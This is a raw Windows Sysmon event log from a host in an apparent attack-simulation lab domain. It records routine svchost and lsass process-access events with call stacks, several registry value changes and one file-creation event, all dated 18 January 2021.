13:33:58.971{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000990Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.971{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000989Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:58.971{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000988Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.971{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000987Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:58.971{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000986Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.971{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000985Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:58.971{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000984Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.971{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000983Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:58.955{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000982Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.955{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000981Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:58.955{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000980Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.893{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|c:\windows\system32\lsm.dll+23c29|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+db992|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000979Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:58.893{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+23c18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+db992|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000978Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.893{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+19ab3|c:\windows\system32\lsm.dll+1fc37|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000977Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:58.893{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1fb39|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000976Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.877{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000975Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:58.877{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000974Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.877{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000973Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:58.877{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1300-00000000A301}1280C:\Windows\system32\dwm.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000972Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:58.861{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Winmgmt\Parameters\ServiceDllUnloadOnStopDWORD (0x00000001) 13241300x8000000000000000971Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:58.846{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\srvnet\Parameters\MajorSequenceDWORD (0x000001a3) 13241300x8000000000000000970Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:58.846{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\EventLog\System\mrxsmb\ParameterMessageFile%%SystemRoot%%\System32\kernel32.dll 11241100x8000000000000000969Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localT10532021-01-18 13:33:58.830{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exeC:\Windows\Tasks\SA.DAT2016-09-12 11:34:03.403 
13241300x8000000000000000968Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:58.830{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Dnscache\Parameters\Probe\{dea2c7f1-98ff-44fe-986c-3ff3dfaedd2b}\NetworkPerformsHijackingDWORD (0x00000000) 13241300x8000000000000000967Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:58.830{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Dnscache\Parameters\Probe\{dea2c7f1-98ff-44fe-986c-3ff3dfaedd2b}\LastProbeTimeDWORD (0x60058e46) 13241300x8000000000000000966Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:58.830{59A5CD1D-8E46-6005-1100-00000000A301}1172C:\Windows\system32\svchost.exeHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles\{DEA2C7F1-98FF-44FE-986C-3FF3DFAEDD2B}\DateLastConnectedBinary Data 10341000x8000000000000000965Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.814{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-8E42-6005-0100-00000000A301}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x8000000000000000964Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.814{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-8E42-6005-0100-00000000A301}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000963Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:58.814{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\EventLog\System\mrxsmb\ParameterMessageFile%%SystemRoot%%\System32\kernel32.dll 13241300x8000000000000000962Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:58.814{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\EventLog\System\mrxsmb\ParameterMessageFile%%SystemRoot%%\System32\kernel32.dll 10341000x8000000000000000961Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:58.814{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 